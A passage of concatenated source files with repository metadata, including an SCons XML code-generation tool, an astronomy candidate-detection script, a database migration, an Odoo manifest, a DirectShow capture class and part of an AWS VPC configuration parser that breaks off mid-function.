# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY ROBOTERCLUB AACHEN E.V. ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL ROBOTERCLUB AACHEN E.V. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import re
import SCons
import SCons.Errors
# TODO make this more robust against whitespace etc.
includeExpression = re.compile(r'<include>(\S+)</include>', re.M)
# -----------------------------------------------------------------------------
def find_includes(env, file, include_path):
""" Find include directives in an XML file """
files = []
line_count = 0
for line in open(file).readlines():
line_count = line_count + 1
match = includeExpression.search(line)
if match:
filename = match.group(1)
relative_to_file = os.path.join(os.path.dirname(os.path.abspath(file)), filename)
relative_to_include_path = os.path.join(include_path, filename)
# 1.) include file name can be absolut
if os.path.isabs(filename):
files.append(filename)
# 2.) it could be a path relative to the files path
# this works just like #include "{filename}" in C/C++
elif os.path.isfile(relative_to_file):
files.append(relative_to_file)
# 3.) it could be a path relative to the include path
elif os.path.isfile(relative_to_include_path):
files.append(relative_to_include_path)
# 4.) Error!
else:
env.Error("Could not find include file '%s' in '%s:%s'" % (filename, file, line_count))
return files
def xml_include_scanner(node, env, path, arg=None):
""" Generates the dependencies for the XML files """
abspath, targetFilename = os.path.split(node.get_abspath())
stack = [targetFilename]
dependencies = [targetFilename]
while stack:
nextFile = stack.pop()
files = find_includes(env, os.path.join(abspath, nextFile), abspath)
for file in files:
if file not in dependencies:
stack.append(file)
dependencies.extend(files)
dependencies.remove(targetFilename)
return dependencies
# -----------------------------------------------------------------------------
def packet_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "packets.cpp"),
os.path.join(path, "packets.hpp")]
return (target, source)
def identifier_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "identifier.hpp")]
return (target, source)
def postman_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "postman.cpp"),
os.path.join(path, "postman.hpp")]
return (target, source)
def communication_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "communication.hpp")]
return (target, source)
def xpcc_task_caller_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "caller.hpp")]
return (target, source)
# -----------------------------------------------------------------------------
def generate(env, **kw):
env.SetDefault(XPCC_SYSTEM_DESIGN_SCANNERS = {})
env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'] = SCons.Script.Scanner(
function = xml_include_scanner,
skeys = ['.xml'])
env['BUILDERS']['SystemCppPackets'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_packets.py" ' \
'--source_path ${TARGETS[0].dir} ' \
'--header_path ${TARGETS[1].dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_PACKETS_COMSTR"),
emitter = packet_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppIdentifier'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_identifier.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_IDENTIFIER_COMSTR"),
emitter = identifier_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppPostman'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_postman.py" ' \
'--container "${container}" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_POSTMAN_COMSTR"),
emitter = postman_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppCommunication'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_communication.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_COMMUNICATION_COMSTR"),
emitter = communication_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppXpccTaskCaller'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_xpcc_task_caller.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_XPCC_TASK_CALLER_COMSTR"),
emitter = xpcc_task_caller_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
if SCons.Script.ARGUMENTS.get('verbose') != '1':
env['SYSTEM_CPP_PACKETS_COMSTR'] = "Generate packets from: $SOURCE"
env['SYSTEM_CPP_IDENTIFIER_COMSTR'] = "Generate identifier from: $SOURCE"
env['SYSTEM_CPP_POSTMAN_COMSTR'] = "Generate postman from: $SOURCE"
env['SYSTEM_CPP_COMMUNICATION_COMSTR'] = "Generate communication stubs from: $SOURCE"
env['SYSTEM_CPP_XPCC_TASK_CALLER_COMSTR'] = "Generate xpcc task callers from: $SOURCE"
def exists(env):
return True
|
chrism333/xpcc
|
scons/site_tools/system_design.py
|
Python
|
bsd-3-clause
| 7,787 | 0.038012 |
from sacred import Experiment
ex = Experiment('my_commands')
@ex.config
def cfg():
name = 'kyle'
@ex.command
def greet(name):
print('Hello {}! Nice to greet you!'.format(name))
@ex.command
def shout():
print('WHAZZZUUUUUUUUUUP!!!????')
@ex.automain
def main():
print('This is just the main command. Try greet or shout.')
|
zzsza/TIL
|
python/sacred/my_command.py
|
Python
|
mit
| 345 | 0.002899 |
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 7 14:53:55 2016
@author: nu
"""
import numpy as np
import timeit, os, sys
from astropy.coordinates import SkyCoord
from astropy.table import Column
from astroquery.vizier import Vizier
from astropy import units as u
from TAROT_PL import TarotPIP
from Filter_data import (reoffset, Lsep_candi, tbmagnitude, XYlimit, W_to_P)
#from Data_graph import candidateplot
from renametxt import Renametxt
""" This algorithm will run a file at a time by in put directly """
start = timeit.default_timer()
#start import file
input_fits = raw_input("Please put FITS [/path_file/file.fits]: "); fitsfile = Renametxt(input_fits)
savefolder = '/home/tarot/Documents/Data_Output/' # where to keep file, change where you want here
if not os.path.exists(savefolder):
savefolder = '/tmp/'
print("Output is at %s" %savefolder)
#Use algorithm from TarotPip
""" SExdata is data extract by Sextractor which keep in 'output.cat'
Catalog is obtain from USNO-B1.0 and store in Table format
Ccata is the coordinate of catalog in SkyCoord [RA, DEC]
Cdata is the coordinate of object from image in SkyCoord [RA, DEC]"""
TAROT_data = TarotPIP(fitsfile); TAROT_data.fitsfileinfo();
try:
SExdata, Catalog, Ccata, Cdata = TAROT_data.readData()
except(ValueError, IOError):
print("%s: check data table, catalog\n"%TAROT_data.image)
sys.exit(0)
#hdu = fits.open(fitsfile); tbdata = hdu[0].data; hdu.close();
""" Start to math by using 'match_to_catalog_sky' import from 'Astropy'
idx is the index of object in catalog that math with Cdata
d2d is the angular separation between Ccata and Cdata in degree
d3d is 3 dimension distace [we don't use it
matches are the closest Ccata with Cdata in SkyCoord [RA, DEC]"""
try:
idx, d2d, d3d, matches = TAROT_data.Data_match_catalog()
except (ValueError, IOError):
print("\n Matching error !!!, check 'Data_match_catalog function'")
sys.exit(1)
#Calibration data with catalog
""" Calibration the object in image to catalog and then re-matching again
idx, d2d, matches are the same meaning but value and coordinate may change
Cdata_offset is the new SkyCoord of Cdata after calibration (or off-set)"""
try:
idx, d2d, d3d, matches, Cdata_offset = reoffset(d2d, matches, Cdata, Ccata)
except (ValueError, IOError):
print("\n offset coordinate error !!!, check 'reoffset function'")
sys.exit(2)
# Sellect candidate from high angular distance (assume it is new object in field)
""" idx_candi_catalog is the idx for catalog
idx_candi_data is the idx for data [Cation there are two data's SkyCoord]"""
try:
idx_candi_catalog, idx_candi_data = Lsep_candi(3, idx, d2d, SExdata) #10*std of d2d
except(ValueError, IOError):
print("\n Candidate sellected error !!!, check 'Lsep_candi function'")
sys.exit(3)
#cut candidate near the edge of image
try:
XYcandi, idx_XYcandi_data, idx_XYcandi_cata = XYlimit(Cdata_offset,idx_candi_data, idx_candi_catalog, TAROT_data.new_wcs)
except(ValueError, IOError):
print("\nProblem with limit candidate in the edge !!!, check 'idx_XYcandi_cata' function")
sys.exit(4)
#convert world to pixel
try:
Catalog_WTP, Matches_WTP, Cdata_offset_WTP = W_to_P(Ccata, Cdata_offset, matches, TAROT_data.new_wcs)
except(ValueError, IOError):
print("\n Convert wcs error!!!, check 'W_to_P function'")
sys.exit(5)
#Sellect candidate by local angular separation (among 10 objects that next to each other)
""" d2d_candi is in dagree, the candidate sellected by using the angular separation
Cdata_candi, Ccata_candi are the SkyCoord [RA, DEC] of candidate
for data(off-set) and catalog, repectively but
cata_candi is the information of candidate in catalog (all info. available)"""
#d2d_candi = d2d[idx_candi_data]
Cdata_candi = Cdata_offset[idx_XYcandi_data]
cata_candi = Catalog[idx_XYcandi_cata]
Ccata_candi = Ccata[idx_XYcandi_cata]
#Magnitude comparison and sellection
""" There is mismatch between magnitude of data and catalog """
tbmag = tbmagnitude(idx, SExdata, Catalog)
Cdata_col_ra = Column(Cdata_offset.ra, name='ra')
Cdata_col_dec = Column(Cdata_offset.dec, name='dec')
Ang_sept_candidate = Column((d2d.arcsec*u.arcsec), name='Separation')
tbmag.add_column(Cdata_col_ra,index=None)
tbmag.add_column(Cdata_col_dec,index=None)
tbmag.add_column(Ang_sept_candidate,index=None)
Candi_d2d = tbmag[idx_XYcandi_data]
""" Candidate can be create in a tables,
by angular distance (d2d), in ASCII or HTML file
"""
#HTML
#savename_html = os.path.join(savefolder, TAROT_data.fname + 'html_d2d_candidate.dat')
#Candi_d2d.write(savename_html, format='ascii.html')
#ASCII
#savename_ascii = os.paht.join(savefolder, TAROT_data.fname + 'ascii_d2d_candidate.dat')
#Candi_d2d.write(savename_ascii, format='ascii')
print(':::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::')
print('\nMedain of separation : STD %3.2f\" : %3.2f\"\n' %(np.median(d2d.arcsec), np.std(d2d.arcsec)))
print('Number of candidate\t\t:%d\n' %len(Candi_d2d))
print('-----------------------------------------------------------------\n')
print Candi_d2d
print("\n")
line0_reg_ds9 = "global color=green dashlist=8 3 width=1 font=\"helvetica 10 normal roman\" select=1 highlite=1 dash=0 fixed=0 edit=1 move=1 delete=1 include=1 source=1\n"
line1_reg_ds9 = "icrs\n"
Candi_reg = open("/tmp/Candi_region_Gaia.reg", 'w')
Candi_reg.write(line0_reg_ds9)
Candi_reg.write(line1_reg_ds9)
for i in range(len(Candi_d2d)):
Candi_reg.write("circle(%f, %f, 16.0\") # color=red text={Gaia_%d}\n" %(Candi_d2d["ra"][i], Candi_d2d["dec"][i], i))
Candi_reg.close()
#print("circle(%f, %f, 16.0\") # color=red text={Gaia_%d}" %(Candi_d2d["ra"][i], Candi_d2d["dec"][i], i))
print("\n")
print(':::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::')
#Filter candidate by checking with catalog USNO and NOMAD1
confirm_1 = []; confirm_2 = [];
confirm_candi_0 = []; confirm_candi_1 = []; confirm_candi_2 = [];
for i in range(len(Cdata_candi)):
confirm_candi_1 = Vizier(catalog="USNO-B1.0", row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi_1:
confirm_1.append(i)
for i in range(len(Cdata_candi)):
confirm_candi_2 = Vizier(catalog="NOMAD1", row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi_2:
confirm_2.append(i)
# Write candidate to disk
savename_ascii = os.path.join(savefolder,TAROT_data.fname + '.candi.dat')
info_candi_1 = Candi_d2d[confirm_1]
info_candi_1.write(savename_ascii, format='ascii') # Candidate after check with USNO-B1.0 and write to disk
info_candi_2 = Candi_d2d[confirm_2]
print("\n::::::::::::::::::::::: Potential candidate check with USNO-B1.0 :::::::::::::::::::::\n")
try:
print(info_candi_1)
print("\n")
Candi_reg1 = open("/tmp/Candi_region_USNO.txt", 'w')
Candi_reg1.write(line0_reg_ds9)
Candi_reg1.write(line1_reg_ds9)
for i in range(len(info_candi_1)):
Candi_reg1.write("circle(%f, %f, 16.0\") # color=blue text={USNO_%d}\n" %(info_candi_1["ra"][i], info_candi_1["dec"][i], i))
Candi_reg1.close()
print("Number of Candidate %d" %len(info_candi_1))
print("\n"*2)
except(ValueError, NameError):
print("No candidate in USNO-B1.0\n\n")
print("\n::::::::::::::::::::::: Potential candidate check with NOMAD1 :::::::::::::::::::::\n")
try:
print(info_candi_2)
print("\n")
Candi_reg2 = open("/tmp/Candi_region_NOMAD1.txt", 'w')
Candi_reg2.write(line0_reg_ds9)
Candi_reg2.write(line1_reg_ds9)
for i in range(len(info_candi_2)):
Candi_reg2.write("circle(%f, %f, 16.0\") # color=green text={NOMAD1_%d}\n" %(info_candi_2["ra"][i], info_candi_2["dec"][i], i))
Candi_reg2.close()
print("Number of Candidate %d" %len(info_candi_2))
print("\n"*2)
except(ValueError, NameError):
print("No candidate in NOMAD1\n\n")
stop = timeit.default_timer()
runtime = stop - start
print("\nRuntime = %2.2f" %runtime)
#graph0 = candidateplot(TAROT_data.tbdata,XYcandi['Xpix'],XYcandi['Ypix'], 'Candidate by angular separation')
|
Noysena/TAROT
|
SFile.py
|
Python
|
gpl-3.0
| 8,161 | 0.010538 |
"""alter database for mysql compatibility
Revision ID: 9be372ec38bc
Revises: 4328f2c08f05
Create Date: 2020-02-16 15:43:35.276655
"""
from alembic import op
import sqlalchemy as sa
from docassemble.webapp.database import dbtableprefix, dbprefix, daconfig
import sys
# revision identifiers, used by Alembic.
revision = '9be372ec38bc'
down_revision = '4328f2c08f05'
branch_labels = None
depends_on = None
def upgrade():
if dbprefix.startswith('postgresql') and not daconfig.get('force text to varchar upgrade', False):
sys.stderr.write("Not changing text type to varchar type because underlying database is PostgreSQL\n")
else:
op.alter_column(
table_name='userdict',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='userdictkeys',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='chatlog',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='uploads',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='uploads',
column_name='yamlfile',
type_=sa.String(255)
)
op.alter_column(
table_name='objectstorage',
column_name='key',
type_=sa.String(1024)
)
op.alter_column(
table_name='speaklist',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='shortener',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='shortener',
column_name='key',
type_=sa.String(255)
)
op.alter_column(
table_name='machinelearning',
column_name='key',
type_=sa.String(1024)
)
op.alter_column(
table_name='machinelearning',
column_name='group_id',
type_=sa.String(1024)
)
op.alter_column(
table_name='globalobjectstorage',
column_name='key',
type_=sa.String(1024)
)
op.create_index(dbtableprefix + 'ix_uploads_yamlfile', 'uploads', ['yamlfile'])
def downgrade():
op.alter_column(
table_name='userdict',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='userdictkeys',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='chatlog',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='uploads',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='uploads',
column_name='yamlfile',
type_=sa.Text()
)
op.alter_column(
table_name='objectstorage',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='speaklist',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='shortener',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='shortener',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='machinelearning',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='machinelearning',
column_name='group_id',
type_=sa.Text()
)
op.alter_column(
table_name='globalobjectstorage',
column_name='key',
type_=sa.Text()
)
op.drop_index(dbtableprefix + 'ix_uploads_yamlfile', table_name='uploads')
|
jhpyle/docassemble
|
docassemble_webapp/docassemble/webapp/alembic/versions/9be372ec38bc_alter_database_for_mysql_compatibility.py
|
Python
|
mit
| 3,895 | 0.001284 |
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of CampOS Event,
# an Odoo module.
#
# Copyright (c) 2015 Stein & Gabelgaard ApS
# http://www.steingabelgaard.dk
# Hans Henrik Gaelgaard
#
# CampOS Event is free software:
# you can redistribute it and/or modify it under the terms of the GNU
# Affero General Public License as published by the Free Software
# Foundation,either version 3 of the License, or (at your option) any
# later version.
#
# CampOS Event is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with CampOS Event.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': "CampOS Event",
'summary': """
Scout Camp Management Solution""",
# 'description': put the module description in README.rst
'author': "Hans Henrik Gabelgaard",
'website': "http://www.steingabelgaard.dk",
# Categories can be used to filter modules in modules listing
# Check http://goo.gl/0TfwzD for the full list
'category': 'Uncategorized',
'version': '0.1',
'license': 'AGPL-3',
# any module necessary for this one to work correctly
'depends': [
'base',
'mail',
'event',
'website',
'portal',
'survey',
'website_event_register_free',
'base_suspend_security',
'website_jquery_ui',
'base_geoengine',
'geoengine_partner',
'web_widget_color',
'project_issue',
'project_model_to_issue',
'website_event_track',
'web_widget_datepicker_options',
],
# always loaded
'data': [
'views/res_country.xml',
'views/product_template.xml',
'views/campos_staff_del_prod.xml',
'security/campos_event_security.xml',
'security/campos_subcamp_exception.xml',
'security/campos_subcamp.xml',
'security/campos_registration_view.xml',
'security/campos_function_view.xml',
'security/ir.model.access.csv',
'security/ir.rule.csv',
'security/campos_staff_del_prod.xml',
'data/campos.municipality.csv',
'data/campos.scout.org.csv',
'data/job_ask_project.xml',
'views/templates.xml',
'views/participant_view.xml',
'views/event_registration_view.xml',
'views/committee_view.xml',
'views/municipality_view.xml',
"views/scout_org_view.xml",
"views/res_partner_view.xml",
"views/job_view.xml",
"views/job_template.xml",
"views/mail_templates.xml",
"views/confirm_template.xml",
"views/event_view.xml",
#"views/portal_menu.xml",
"views/res_users_view.xml",
'views/campos_menu.xml',
'views/campos_subcamp_exception.xml',
'views/campos_subcamp.xml',
'views/event_partner_reg_template.xml',
'views/meeting_proposal_template.xml',
'views/event_track_view.xml',
'views/campos_camp_area.xml',
'data/camp_area_committee.xml',
'data/participant_number.xml',
'security/campos_par_tag.xml',
'views/campos_par_tag.xml',
'security/campos_reg_tag.xml',
'views/campos_reg_tag.xml',
'views/extern_jobber_template.xml',
],
# only loaded in demonstration mode
'demo': [
'demo.xml',
],
}
|
sl2017/campos
|
campos_event/__openerp__.py
|
Python
|
agpl-3.0
| 3,874 | 0.001807 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import threading
import cv2
from ikalog.utils import *
from ikalog.inputs.win.videoinput_wrapper import VideoInputWrapper
from ikalog.inputs import VideoInput
class DirectShow(VideoInput):
# override
def _enumerate_sources_func(self):
return self._videoinput_wrapper.get_device_list()
def read_raw(self):
if self._device_id is None:
return None
frame = self._videoinput_wrapper.get_pixels(
self._device_id,
parameters=(
self._videoinput_wrapper.VI_BGR +
self._videoinput_wrapper.VI_VERTICAL_FLIP
)
)
return frame
# override
def _read_frame_func(self):
frame = self.read_raw()
return frame
# override
def _initialize_driver_func(self):
pass
# override
def _cleanup_driver_func(self):
pass
# override
def _is_active_func(self):
return (self._device_id is not None)
# override
def _select_device_by_index_func(self, source, width=1280, height=720, framerate=59.94):
device_id = int(source)
vi = self._videoinput_wrapper
self.lock.acquire()
try:
if self._device_id is not None:
raise Exception('Need to deinit the device')
formats = [
{'width': width, 'height': height, 'framerate': None},
{'width': width, 'height': height, 'framerate': framerate},
]
for fmt in formats:
if fmt['framerate']:
vi.set_framerate(device_id, fmt['framerate'])
retval = vi.init_device(
device_id,
flags=self._videoinput_wrapper.DS_RESOLUTION,
width=fmt['width'],
height=fmt['height'],
)
if retval:
self._source_width = vi.get_frame_width(device_id)
self._source_height = vi.get_frame_height(device_id)
success = \
(width == self._source_width) and (
height == self._source_height)
if success or (not self.cap_optimal_input_resolution):
self._device_id = device_id
break
vi.deinit_device(device_id)
# end of for loop
if self._device_id is None:
IkaUtils.dprint(
'%s: Failed to init the capture device %d' %
(self, device_id)
)
finally:
self.lock.release()
# override
def _select_device_by_name_func(self, source):
IkaUtils.dprint('%s: Select device by name "%s"' % (self, source))
try:
index = self.enumerate_sources().index(source)
except ValueError:
IkaUtils.dprint('%s: Input "%s" not found' % (self, source))
return False
IkaUtils.dprint('%s: "%s" -> %d' % (self, source, index))
self._select_device_by_index_func(index)
def __init__(self):
self.strict_check = False
self._device_id = None
self._warned_resolution = False
self._videoinput_wrapper = VideoInputWrapper()
super(DirectShow, self).__init__()
if __name__ == "__main__":
obj = DirectShow()
list = obj.enumerate_sources()
for n in range(len(list)):
IkaUtils.dprint("%d: %s" % (n, list[n]))
dev = input("Please input number (or name) of capture device: ")
obj.select_source(dev)
k = 0
while k != 27:
frame = obj.read_frame()
if frame is not None:
cv2.imshow(obj.__class__.__name__, frame)
k = cv2.waitKey(1)
if k == ord('s'):
import time
cv2.imwrite('screenshot_%d.png' % int(time.time()), frame)
|
hasegaw/IkaLog
|
ikalog/inputs/win/directshow.py
|
Python
|
apache-2.0
| 4,592 | 0.000436 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License
from keystone.contrib.extensions.admin.osksadm.extension_handler\
import ExtensionHandler as KSADMExtensionHandler
from keystone.contrib.extensions.admin.oskscatalog.extension_handler\
import ExtensionHandler as KSCATALOGExtensionHandler
def configure_extensions(mapper, options):
#TODO: Make extensions configurable.
ksadm_extenion_handler = KSADMExtensionHandler()
ksadm_extenion_handler.map_extension_methods(mapper, options)
kscatalog_extension_handler = KSCATALOGExtensionHandler()
kscatalog_extension_handler.map_extension_methods(mapper, options)
|
genius1611/Keystone
|
keystone/contrib/extensions/admin/__init__.py
|
Python
|
apache-2.0
| 1,232 | 0.000812 |
# -*- coding: utf-8 -*-
import netaddr
from opinel.utils.aws import get_name
from opinel.utils.globals import manage_dictionary
from opinel.utils.fs import load_data, read_ip_ranges
from AWSScout2.utils import ec2_classic, get_keys
from AWSScout2.configs.regions import RegionalServiceConfig, RegionConfig
from AWSScout2.configs.vpc import VPCConfig as SingleVPCConfig
########################################
# Globals
########################################
protocols_dict = load_data('protocols.json', 'protocols')
########################################
# VPCRegionConfig
########################################
class VPCRegionConfig(RegionConfig):
"""
VPC configuration for a single AWS region
"""
def parse_customer_gateway(self, global_params, region, cgw):
cgw['id'] = cgw.pop('CustomerGatewayId')
self.customer_gateways[cgw['id']] = cgw
def parse_flow_log(self, global_params, region, fl):
"""
:param global_params:
:param region:
:param fl:
:return:
"""
get_name(fl, fl, 'FlowLogId')
fl_id = fl.pop('FlowLogId')
self.flow_logs[fl_id] = fl
def parse_network_acl(self, global_params, region, network_acl):
"""
:param global_params:
:param region:
:param network_acl:
:return:
"""
vpc_id = network_acl['VpcId']
network_acl['id'] = network_acl.pop('NetworkAclId')
get_name(network_acl, network_acl, 'id')
manage_dictionary(network_acl, 'rules', {})
network_acl['rules']['ingress'] = self.__parse_network_acl_entries(network_acl['Entries'], False)
network_acl['rules']['egress'] = self.__parse_network_acl_entries(network_acl['Entries'], True)
network_acl.pop('Entries')
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].network_acls[network_acl['id']] = network_acl
def __parse_network_acl_entries(self, entries, egress):
"""
:param entries:
:param egress:
:return:
"""
acl_dict = {}
for entry in entries:
if entry['Egress'] == egress:
acl = {}
for key in ['RuleAction', 'RuleNumber']:
acl[key] = entry[key]
acl['CidrBlock'] = entry['CidrBlock'] if 'CidrBlock' in entry else entry['Ipv6CidrBlock']
acl['protocol'] = protocols_dict[entry['Protocol']]
if 'PortRange' in entry:
from_port = entry['PortRange']['From'] if entry['PortRange']['From'] else 1
to_port = entry['PortRange']['To'] if entry['PortRange']['To'] else 65535
acl['port_range'] = from_port if from_port == to_port else str(from_port) + '-' + str(to_port)
else:
acl['port_range'] = '1-65535'
acl_dict[acl.pop('RuleNumber')] = acl
return acl_dict
def parse_route_table(self, global_params, region, rt):
route_table = {}
vpc_id = rt['VpcId']
get_name(rt, route_table, 'VpcId') # TODO: change get_name to have src then dst
get_keys(rt, route_table, ['Routes', 'Associations', 'PropagatingVgws'])
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].route_tables[rt['RouteTableId']] = route_table
def parse_subnet(self, global_params, region, subnet):
"""
:param global_params:
:param region:
:param subnet:
:return:
"""
vpc_id = subnet['VpcId']
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
subnet_id = subnet['SubnetId']
get_name(subnet, subnet, 'SubnetId')
subnet['flow_logs'] = []
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].subnets[subnet_id] = subnet
def parse_vpc(self, global_params, region_name, vpc):
"""
:param global_params:
:param region_name:
:param vpc:
:return:
"""
vpc_id = vpc['VpcId']
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].name = get_name(vpc, {}, 'VpcId')
def parse_vpn_connection(self, global_params, region_name, vpnc):
vpnc['id'] = vpnc.pop('VpnConnectionId')
self.vpn_connections[vpnc['id']] = vpnc
def parse_vpn_gateway(self, global_params, region_name, vpng):
vpng['id'] = vpng.pop('VpnGatewayId')
self.vpn_gateways[vpng['id']] = vpng
########################################
# VPCConfig
########################################
class VPCConfig(RegionalServiceConfig):
"""
VPC configuration for all AWS regions
"""
region_config_class = VPCRegionConfig
def __init__(self, service_metadata, thread_config):
super(VPCConfig, self).__init__(service_metadata, thread_config)
########################################
##### VPC analysis functions
########################################
#
# Add a display name for all known CIDRs
#
known_cidrs = {'0.0.0.0/0': 'All'}
def put_cidr_name(aws_config, current_config, path, current_path, resource_id, callback_args):
if 'cidrs' in current_config:
cidr_list = []
for cidr in current_config['cidrs']:
if type(cidr) == dict:
cidr = cidr['CIDR']
if cidr in known_cidrs:
cidr_name = known_cidrs[cidr]
else:
cidr_name = get_cidr_name(cidr, callback_args['ip_ranges'], callback_args['ip_ranges_name_key'])
known_cidrs[cidr] = cidr_name
cidr_list.append({'CIDR': cidr, 'CIDRName': cidr_name})
current_config['cidrs'] = cidr_list
#
# Read display name for CIDRs from ip-ranges files
#
aws_ip_ranges = {} # read_ip_ranges(aws_ip_ranges_filename, False)
def get_cidr_name(cidr, ip_ranges_files, ip_ranges_name_key):
for filename in ip_ranges_files:
ip_ranges = read_ip_ranges(filename, local_file = True)
for ip_range in ip_ranges:
ip_prefix = netaddr.IPNetwork(ip_range['ip_prefix'])
cidr = netaddr.IPNetwork(cidr)
if cidr in ip_prefix:
return ip_range[ip_ranges_name_key].strip()
for ip_range in aws_ip_ranges:
